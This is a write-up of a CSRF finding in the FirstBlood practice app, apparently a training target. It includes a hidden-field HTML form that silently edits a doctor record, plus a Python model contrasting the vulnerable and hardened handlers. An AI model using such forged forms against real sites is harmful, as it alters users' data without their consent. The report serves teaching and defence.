FirstBlood-#1014 CSRF to edit doctors information
This issue was discovered on FirstBlood v3

On 2022-12-08, properlay Level 7 reported:

Hello, I found a CSRF vulnerability to edit doctors' information.

To reproduce:

  1. Log in to your doctor administrator account.

  2. Copy and paste the code below into an HTML file.

        <!-- Forged request to the doctor edit endpoint; the csrf field is left blank because the server does not validate it -->
        <form method="POST" action="">
            <input type="hidden" name="drid" value="1"/>
            <input type="hidden" name="name" value="attacke"/>
            <input type="hidden" name="bio" value="attacker"/>
            <input type="hidden" name="bookable" value="1"/>
            <input type="hidden" name="csrf" value=""/>
            <input type="submit" value="Submit">
        </form>

  3. Open it in a browser; you will see doctor Julie's information change.


Doctors' information can be edited via CSRF.

P4 Low

FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and a lack of token validation. It was intended that a POST request would not work because no cookies are sent with the request (due to SameSite), but owing to an oversight this cookie was overwritten, rendering it useless.
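To make the two points in that note concrete (a handler that accepts any method and never checks the token, and a SameSite cookie whose protection is lost once a later Set-Cookie replaces it), here is an added Python model. It is not FirstBlood code: the `BrowserJar`, the `SESSIONS` store, the `edit_doctor_*` handlers, the `PHPSESSID` cookie name and the `run_attack` scenario are constructed for illustration, and the cookie rules are a simplified reading of SameSite in which a cookie with no SameSite attribute is treated as sent cross-site (an assumption; browsers that default to Lax would still withhold it on a cross-site POST).

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Cookie:
    value: str
    samesite: Optional[str]  # "Strict", "Lax", "None", or None when the attribute is absent


class BrowserJar:
    """Minimal cookie store (constructed for this example). A Set-Cookie for a
    name that already exists replaces the stored cookie wholesale, attributes
    included (RFC 6265 section 5.3), which is how a SameSite=Strict session
    cookie can silently lose its protection."""

    def __init__(self) -> None:
        self.cookies: Dict[str, Cookie] = {}

    def set_cookie(self, name: str, value: str, samesite: Optional[str] = None) -> None:
        self.cookies[name] = Cookie(value, samesite)

    def cookies_for(self, method: str, cross_site: bool) -> Dict[str, str]:
        """Cookies the browser attaches to a request of the given method."""
        sent: Dict[str, str] = {}
        for name, c in self.cookies.items():
            if not cross_site or c.samesite not in ("Strict", "Lax"):
                # same-site request, SameSite=None, or attribute absent:
                # modelled as always sent (assumption, see lead-in)
                sent[name] = c.value
            elif c.samesite == "Lax" and method == "GET":
                sent[name] = c.value  # Lax allows top-level safe navigations
            # Strict, or Lax with a non-GET method: cookie withheld
        return sent


SESSIONS: Dict[str, Dict[str, str]] = {}  # session id -> {"user", "csrf"}


def login(jar: BrowserJar, user: str, samesite: Optional[str] = "Strict") -> str:
    """Create a session and issue the session cookie with the intended defence."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    jar.set_cookie("PHPSESSID", sid, samesite)
    return sid


def edit_doctor_vulnerable(method, cookies, params, doctors) -> int:
    """Mirrors the reported behaviour: any method accepted, csrf parameter ignored."""
    sess = SESSIONS.get(cookies.get("PHPSESSID", ""))
    if sess is None:
        return 403
    doctors[params["drid"]]["name"] = params["name"]
    return 200


def edit_doctor_hardened(method, cookies, params, doctors) -> int:
    """POST only, and the submitted csrf value must equal the session's token."""
    sess = SESSIONS.get(cookies.get("PHPSESSID", ""))
    if sess is None:
        return 403
    if method != "POST":
        return 405
    if not hmac.compare_digest(params.get("csrf", ""), sess["csrf"]):
        return 403
    doctors[params["drid"]]["name"] = params["name"]
    return 200


def run_attack(handler, overwrite_cookie: bool, method: str):
    """Victim logs in, optionally has the session cookie re-issued without
    SameSite, then visits an attacker page that submits the report's form."""
    doctors = {"1": {"name": "Julie"}}  # constructed sample record
    jar = BrowserJar()
    sid = login(jar, "admin")
    if overwrite_cookie:
        jar.set_cookie("PHPSESSID", sid)  # same value, SameSite attribute dropped
    forged = {"drid": "1", "name": "attacke", "bio": "attacker",
              "bookable": "1", "csrf": ""}
    cookies = jar.cookies_for(method, cross_site=True)
    status = handler(method, cookies, forged, doctors)
    return status, doctors["1"]["name"]


def run_legitimate_edit(handler):
    """Same-site POST carrying the session's real token must still succeed."""
    doctors = {"1": {"name": "Julie"}}
    jar = BrowserJar()
    sid = login(jar, "admin")
    params = {"drid": "1", "name": "Dr Julie", "csrf": SESSIONS[sid]["csrf"]}
    cookies = jar.cookies_for("POST", cross_site=False)
    return handler("POST", cookies, params, doctors), doctors["1"]["name"]
```

With the Strict cookie intact, the forged POST arrives unauthenticated and fails even against the vulnerable handler; once the cookie has been re-issued without the attribute, both the GET and the POST from the attacker's page succeed, which is the situation the note describes. The hardened handler rejects the same requests on method and token regardless of what the cookie does, so the token check, not the cookie attribute, is the control to rely on.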

Report Feedback

Creator & Administrator

Congratulations you were the third researcher to discover this!